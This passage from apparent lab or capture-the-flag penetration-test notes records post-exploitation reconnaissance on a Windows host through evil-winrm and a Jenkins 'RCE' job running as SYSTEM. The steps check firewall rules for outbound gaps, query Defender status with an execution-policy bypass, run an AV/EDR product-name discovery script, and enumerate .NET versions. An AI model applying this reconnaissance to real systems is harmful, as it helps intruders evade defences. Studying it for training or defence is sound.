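            LocalPort     = (@($port.LocalPort)     -join ',')
            RemotePort    = (@($port.RemotePort)    -join ',')
            LocalAddress  = (@($addr.LocalAddress)  -join ',')
            RemoteAddress = (@($addr.RemoteAddress) -join ',')
            Program       = $app.Program
        }
    }
}

function Get-CatchAllBlockRule {
    # A Block rule with no scope at all. Explicit Block rules win over Allow rules
    # and over the profile default, so one of these blocks its entire direction.
    param([object[]]$Detail = (Get-BlockRuleDetail))
    $Detail | Where-Object {
        $_.Protocol -eq 'Any' -and $_.LocalPort -eq 'Any' -and $_.RemotePort -eq 'Any' -and
        $_.LocalAddress -eq 'Any' -and $_.RemoteAddress -eq 'Any' -and $_.Program -eq 'Any'
    }
}

# Per-profile defaults for context (only reached when no rule matches).
Get-NetFirewallProfile | Format-Table Name, Enabled, DefaultInboundAction, DefaultOutboundAction
$detail = Get-BlockRuleDetail
$detail | Format-Table -AutoSize
Get-CatchAllBlockRule -Detail $detail | ForEach-Object { 'catch-all {0} block: {1}' -f $_.Direction, $_.Rule }
```

If BlockOutboundDC turns out to be a catch-all, nothing started on the host will connect back out, which is consistent with reading results from the Jenkins build console instead of a callback; a scoped rule (specific ports or remote addresses) leaves the gaps to work with.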
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins9746192519689189053.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>powershell -ep bypass -nop -c "Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property ExclusionPath"
AMEngineVersion : 0.0.0.0
AMProductVersion : 4.18.2109.6
AMRunningMode : Not running
AMServiceEnabled : False
AMServiceVersion : 0.0.0.0
AntispywareEnabled : False
AntispywareSignatureAge : 4294967295
AntispywareSignatureLastUpdated :
AntispywareSignatureVersion : 0.0.0.0
AntivirusEnabled : False
AntivirusSignatureAge : 4294967295
AntivirusSignatureLastUpdated :
AntivirusSignatureVersion : 0.0.0.0
BehaviorMonitorEnabled : False
ComputerID : B69A5725-131A-4485-A28F-47C70015EB96
ComputerState : 0
FullScanAge : 4294967295
FullScanEndTime :
FullScanStartTime :
IoavProtectionEnabled : False
IsTamperProtected : False
IsVirtualMachine : True
LastFullScanSource : 0
LastQuickScanSource : 0
NISEnabled : False
NISEngineVersion : 0.0.0.0
NISSignatureAge : 4294967295
NISSignatureLastUpdated :
NISSignatureVersion : 0.0.0.0
OnAccessProtectionEnabled : False
QuickScanAge : 4294967295
QuickScanEndTime :
QuickScanStartTime :
RealTimeProtectionEnabled : False
RealTimeScanDirection : 0
TamperProtectionSource : N/A
TDTMode : N/A
TDTStatus : N/A
TDTTelemetry : N/A
PSComputerName :
ExclusionPath : {N/A: Must be and administrator to view exclusions}
AV is disabled: AMServiceEnabled, AntivirusEnabled, RealTimeProtectionEnabled and BehaviorMonitorEnabled are all False, AMRunningMode is "Not running", and the signature versions are 0.0.0.0 with an age of 4294967295 (0xFFFFFFFF), i.e. no signatures are present. The ExclusionPath line is Defender's permissions message, not an exclusion list, so the configured exclusions remain unknown.
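The Defender cmdlets need a CIM session, which the WinRM user above does not get. The following is an added example, not part of the original notes, that reaches the same conclusion without CIM or admin rights: the Service Control Manager, the process list and driverquery.exe all answer to a normal user, show Defender's service state, and also catch any third-party AV or EDR that Get-MpComputerStatus would never mention. The name patterns are an assumed, non-exhaustive list.

```powershell
# Added example (not from the original notes): AV/EDR discovery without CIM.

function Find-SecurityProduct {
    param(
        # Assumed, non-exhaustive service/process/driver name fragments.
        [string[]]$Patterns = @(
            'WinDefend', 'MsMpEng', 'NisSrv', 'MsSense', 'Sense',   # Microsoft Defender / MDE
            'CSFalcon', 'csagent',                                   # CrowdStrike
            'SentinelAgent', 'SentinelOne',                          # SentinelOne
            'CylanceSvc', 'cbdefense', 'CarbonBlack',                # Cylance, Carbon Black
            'Sophos', 'McAfee', 'mfe', 'Symantec', 'ccSvcHst',       # Sophos, McAfee, Symantec
            'ekrn', 'TMBMSRV', 'xagt', 'Elastic', 'Tanium'           # ESET, Trend Micro, FireEye, Elastic, Tanium
        )
    )
    $regex = ($Patterns | ForEach-Object { [regex]::Escape($_) }) -join '|'

    # Service Control Manager: readable by any user, reports Running/Stopped.
    $svc = Get-Service | Where-Object { "$($_.Name) $($_.DisplayName)" -match $regex } | ForEach-Object {
        [pscustomobject]@{ Kind = 'Service'; Name = $_.Name; Detail = "$($_.DisplayName) [$($_.Status)]" }
    }
    # Processes: a stopped service can still leave a user-mode agent running.
    $proc = Get-Process | Where-Object { $_.ProcessName -match $regex } | ForEach-Object {
        [pscustomobject]@{ Kind = 'Process'; Name = $_.ProcessName; Detail = "PID $($_.Id)" }
    }
    # Kernel drivers via driverquery.exe (a plain executable, no CIM); EDR minifilters show up here.
    $drv = driverquery /FO CSV 2>$null | ConvertFrom-Csv |
        Where-Object { "$($_.'Module Name') $($_.'Display Name')" -match $regex } | ForEach-Object {
            [pscustomobject]@{ Kind = 'Driver'; Name = $_.'Module Name'; Detail = "$($_.'Display Name') ($($_.'Driver Type'))" }
        }
    # Wrap each in @() so a single result and $null both concatenate cleanly.
    @($svc) + @($proc) + @($drv)
}

Find-SecurityProduct | Sort-Object Kind, Name | Format-Table -AutoSize
```

On this host expect WinDefend to show as stopped, matching AMServiceEnabled : False above; anything else in the output is a product the Defender status cannot tell you about.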
Session Architecture
*evil-winrm* PS C:\Users\oliver\Documents> [Environment]::Is64BitProcess
True
Session Architecture (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins3930728786260452138.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>powershell -ep bypass -c [Environment]::Is64BitProcess
True
Installed .NET Frameworks
*evil-winrm* PS C:\Users\oliver\Documents> cmd /c dir /A:D C:\Windows\Microsoft.NET\Framework ; cmd /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" ; cmd /c reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
Volume in drive C has no label.
Volume Serial Number is 212C-60B7
Directory of C:\Windows\Microsoft.NET\Framework
09/15/2018 12:19 AM <DIR> .
09/15/2018 12:19 AM <DIR> ..
09/15/2018 12:19 AM <DIR> v1.0.3705
09/15/2018 12:19 AM <DIR> v1.1.4322
09/15/2018 12:19 AM <DIR> v2.0.50727
09/20/2023 02:04 AM <DIR> v4.0.30319
0 File(s) 0 bytes
6 Dir(s) 4,624,556,032 bytes free
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF\v4.0
HttpNamespaceReservationInstalled REG_DWORD 0x1
NetTcpPortSharingInstalled REG_DWORD 0x1
NonHttpActivationInstalled REG_DWORD 0x1
SMSvcHostPath REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
WMIInstalled REG_DWORD 0x1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
InstallPath REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
InstallPath REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0
(Default) REG_SZ deprecated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0\Client
Install REG_DWORD 0x1
Version REG_SZ 4.0.0.0
.NET Framework 4.7.2: the Release DWORD 0x70bf6 is 461814, the 4.7.2 marker on Windows Server 2019; the Version string 4.7.03190 is the build number, not the product version. The NDP key registers only the v4 runtime (no v2.0.50727 or v3.5 subkeys), so the v1.x and v2.0.50727 directories are not backed by an installed runtime and tooling that needs CLR 2.0/3.5 will not load.
Installed .NET Frameworks (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins13451945355414455822.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>dir /A:D C:\Windows\Microsoft.NET\Framework && reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" && reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
Volume in drive C has no label.
Volume Serial Number is 212C-60B7
Directory of C:\Windows\Microsoft.NET\Framework
09/15/2018 12:19 AM <DIR> .
09/15/2018 12:19 AM <DIR> ..
09/15/2018 12:19 AM <DIR> v1.0.3705
09/15/2018 12:19 AM <DIR> v1.1.4322
09/15/2018 12:19 AM <DIR> v2.0.50727
09/20/2023 02:04 AM <DIR> v4.0.30319
0 File(s) 0 bytes
6 Dir(s) 4,624,556,032 bytes free
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF\v4.0
HttpNamespaceReservationInstalled REG_DWORD 0x1
NetTcpPortSharingInstalled REG_DWORD 0x1
NonHttpActivationInstalled REG_DWORD 0x1
SMSvcHostPath REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
WMIInstalled REG_DWORD 0x1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
InstallPath REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
InstallPath REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0
(Default) REG_SZ deprecated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0\Client
Install REG_DWORD 0x1
Version REG_SZ 4.0.0.0